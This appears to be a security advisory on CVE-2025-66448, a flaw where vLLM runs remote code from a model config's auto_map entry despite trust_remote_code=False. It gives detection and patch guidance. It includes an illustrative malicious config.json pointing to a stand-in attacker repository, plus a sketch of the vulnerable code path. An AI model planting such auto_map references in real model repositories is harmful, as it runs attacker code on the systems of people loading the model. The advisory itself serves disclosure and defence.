CVE-2025-66448 Overview
CVE-2025-66448 is a high-severity remote code execution vulnerability in vLLM, a popular inference and serving engine for large language models (LLMs). The flaw resides in the Nemotron_Nano_VL_Config class and allows attackers to execute arbitrary code on systems loading malicious model configurations, even when the trust_remote_code=False security flag is explicitly set.
When vLLM loads a model configuration containing an auto_map entry, the config class resolves that mapping using get_class_from_dynamic_module(...) and immediately instantiates the returned class. This mechanism fetches and executes Python code from remote repositories referenced in the auto_map string, bypassing the intended security controls. An attacker can exploit this by publishing a seemingly benign model repository whose config.json points via auto_map to a separate malicious backend repository, causing the victim's system to silently execute the attacker's code.
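The exploit hinges on the cross-repository form of the Hugging Face auto_map convention, where a reference of the form "other-repo--module.ClassName" tells the loader to fetch the class from a repository other than the one hosting the config. A hypothetical malicious config.json (all repository, module, and class names below are illustrative, not taken from a real exploit) might look like:

```json
{
  "model_type": "Nemotron_Nano_VL",
  "auto_map": {
    "AutoConfig": "attacker-org/benign-looking-backend--configuration.Nemotron_Nano_VL_Config"
  }
}
```

When the loader resolves this entry, the referenced module is downloaded from the attacker-controlled repository and imported, executing any top-level code it contains.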
Critical Impact
Remote attackers can achieve full code execution on systems running vLLM prior to version 0.11.1 by crafting malicious model configurations that bypass the trust_remote_code=False security setting. With a CVSS score of 8.8 (HIGH), this vulnerability poses significant risk to AI/ML infrastructure.
Affected Products
- vLLM versions prior to 0.11.1
- Systems loading untrusted model configurations via vLLM
- AI/ML pipelines utilizing vLLM for inference and model serving
Discovery Timeline
- 2025-12-01 - CVE-2025-66448 published to NVD
- 2025-12-03 - Last updated in NVD database
Technical Details for CVE-2025-66448
Vulnerability Analysis
This vulnerability is classified as CWE-94 (Improper Control of Generation of Code - Code Injection). The attack vector is network-based with low attack complexity, requiring no privileges but some user interaction, as indicated by the CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H.
The vulnerability fundamentally represents a trust boundary violation in vLLM's model loading mechanism. The trust_remote_code parameter was designed as a security control to prevent execution of arbitrary code from remote model repositories. However, the implementation in Nemotron_Nano_VL_Config fails to respect this setting when processing auto_map configuration entries.
The EPSS (Exploit Prediction Scoring System) indicates a 0.153% probability of exploitation in the wild, placing this vulnerability at the 36.567th percentile as of 2025-12-16.
Root Cause
The root cause lies in the vllm.transformers_utils.config.get_config function's handling of auto_map entries. When a model configuration contains an auto_map field, the code path through get_class_from_dynamic_module(...) is triggered regardless of the trust_remote_code setting. This function dynamically imports and instantiates Python classes from URLs specified in the configuration, creating a direct code execution path that circumvents the intended security boundary.
The critical flaw is the immediate instantiation of classes retrieved from remote sources without validating the trust_remote_code flag, effectively rendering this security control ineffective for this specific code path.
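The control-flow difference can be sketched in a few lines. This is not vLLM source code: the function names mirror the real helpers, but the bodies are illustrative stubs showing the vulnerable pattern (resolve auto_map unconditionally) versus the patched pattern (consult trust_remote_code first).

```python
# Minimal sketch of the vulnerable vs. patched control flow.
# All names are illustrative stand-ins for the real vLLM/transformers helpers.

def get_class_from_dynamic_module(class_ref: str):
    """Stand-in for the helper that downloads and imports remote code.
    Here it only signals that remote code would have executed."""
    raise RuntimeError(f"remote code from {class_ref!r} would execute here")


def load_config_vulnerable(config: dict, trust_remote_code: bool):
    # BUG: auto_map is resolved unconditionally; the flag is never consulted,
    # so remote code runs even with trust_remote_code=False.
    if "auto_map" in config:
        return get_class_from_dynamic_module(config["auto_map"]["AutoConfig"])
    return None


def load_config_patched(config: dict, trust_remote_code: bool):
    # FIX: remote resolution happens only when the caller explicitly opts in.
    if "auto_map" in config:
        if not trust_remote_code:
            raise ValueError(
                "config declares auto_map but trust_remote_code=False; refusing to load"
            )
        return get_class_from_dynamic_module(config["auto_map"]["AutoConfig"])
    return None
```

In the vulnerable variant the flag is dead code; in the patched variant a config that declares auto_map is rejected outright unless the operator opted in.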
Attack Vector
The attack vector exploits the model loading pipeline in vLLM. An attacker can execute this attack through the following mechanism:
- The attacker creates a seemingly legitimate model repository with a benign appearance
- The repository's config.json contains an auto_map entry pointing to a malicious backend repository
- When a victim loads this model using vLLM (even with trust_remote_code=False), the engine processes the auto_map configuration
- The get_class_from_dynamic_module(...) function fetches Python code from the attacker-controlled repository
- The malicious code is immediately executed on the victim's system with the privileges of the vLLM process
This attack is particularly dangerous in AI/ML environments where loading pre-trained models from public repositories is common practice. The assumption that trust_remote_code=False provides protection creates a false sense of security.
Detection Methods for CVE-2025-66448
Indicators of Compromise
- Unexpected network connections to unknown repositories during model loading operations
- Unusual process spawning or file system modifications during vLLM model initialization
- Presence of unexpected Python modules or classes being dynamically loaded from remote sources
- Anomalous outbound traffic from vLLM inference servers to external code repositories
Detection Strategies
Organizations should implement monitoring for vLLM model loading operations, particularly focusing on:
- Network Monitoring: Track all outbound connections made during model initialization to identify connections to unexpected repositories
- Process Monitoring: Monitor for child process creation during vLLM operations that may indicate code execution
- Configuration Auditing: Implement validation of model config.json files before loading, specifically checking for suspicious auto_map entries
- Version Detection: Audit all deployed vLLM instances to identify versions prior to 0.11.1
Monitoring Recommendations
Deploy application-level monitoring on systems running vLLM to detect anomalous behavior during model loading operations. Implement network segmentation to limit the ability of vLLM instances to reach arbitrary external repositories. Consider using allowlisting for model sources and implementing pre-validation of model configurations before loading. SentinelOne's behavioral AI engine can detect anomalous code execution patterns that may indicate exploitation of this vulnerability.
How to Mitigate CVE-2025-66448
Immediate Actions Required
- Upgrade all vLLM installations to version 0.11.1 or later immediately
- Audit all model repositories currently in use for suspicious auto_map configurations
- Implement network controls to restrict vLLM instances from accessing untrusted external repositories
- Review logs for any indicators of previous exploitation attempts
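The version-audit action can be scripted for each Python environment. A minimal sketch (the helper names are hypothetical; the parser deliberately ignores pre-release suffixes for brevity):

```python
# Hedged sketch: flag vLLM installations older than the patched 0.11.1.
from importlib import metadata
from typing import Optional

PATCHED = (0, 11, 1)


def parse_version(v: str) -> tuple:
    """Naive X.Y.Z parse; trailing non-digit suffixes (rc1, .dev0) are dropped."""
    parts = []
    for piece in v.split(".")[:3]:
        num = ""
        for ch in piece:
            if not ch.isdigit():
                break
            num += ch
        parts.append(int(num or 0))
    return tuple(parts)


def vllm_is_vulnerable() -> Optional[bool]:
    """True if an installed vLLM predates 0.11.1, None if not installed."""
    try:
        installed = metadata.version("vllm")
    except metadata.PackageNotFoundError:
        return None
    return parse_version(installed) < PATCHED
```

Run the check in every environment (containers, virtualenvs, conda envs) that serves models, since each carries its own vLLM copy.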
Patch Information
The vulnerability has been fixed in vLLM version 0.11.1. The patch commit ffb08379d8870a1a81ba82b72797f196838d0c86 addresses the issue by properly enforcing the trust_remote_code setting for all code paths including auto_map resolution.
Patch resources:
- Commit: https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86
- Security Advisory: https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm
- Pull Request: https://github.com/vllm-project/vllm/pull/28126
Workarounds
If immediate patching is not possible, organizations should implement the following temporary mitigations:
- Network Isolation: Restrict vLLM instances to only access trusted, internal model repositories
- Model Configuration Validation: Implement pre-loading validation to reject model configurations containing auto_map entries pointing to untrusted sources
- Sandboxing: Run vLLM instances in isolated containers with limited network access and restricted privileges
- Source Verification: Only load models from verified, trusted sources and implement checksum validation for model files
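The source-verification workaround above can be implemented with a locally maintained manifest of SHA-256 digests, checked before a model directory is handed to the serving engine. A sketch under that assumption (manifest format and function names are illustrative):

```python
# Hedged sketch: verify model files against a local SHA-256 manifest
# before serving; any mismatch or missing file blocks the load.
import hashlib
from pathlib import Path


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream a file through SHA-256 without loading it all into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_model_dir(model_dir: str, manifest: dict) -> list:
    """Return relative paths whose digest is missing or does not match."""
    mismatches = []
    root = Path(model_dir)
    for rel, expected in manifest.items():
        path = root / rel
        if not path.is_file() or sha256_file(str(path)) != expected.lower():
            mismatches.append(rel)
    return mismatches
```

An empty return value means every manifested file matched; anything else should abort the load and raise an alert.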
```shell
# Upgrade vLLM to the patched version (quote the specifier so the shell
# does not treat ">" as an output redirect)
pip install --upgrade "vllm>=0.11.1"

# Verify the installed version
pip show vllm | grep Version
```


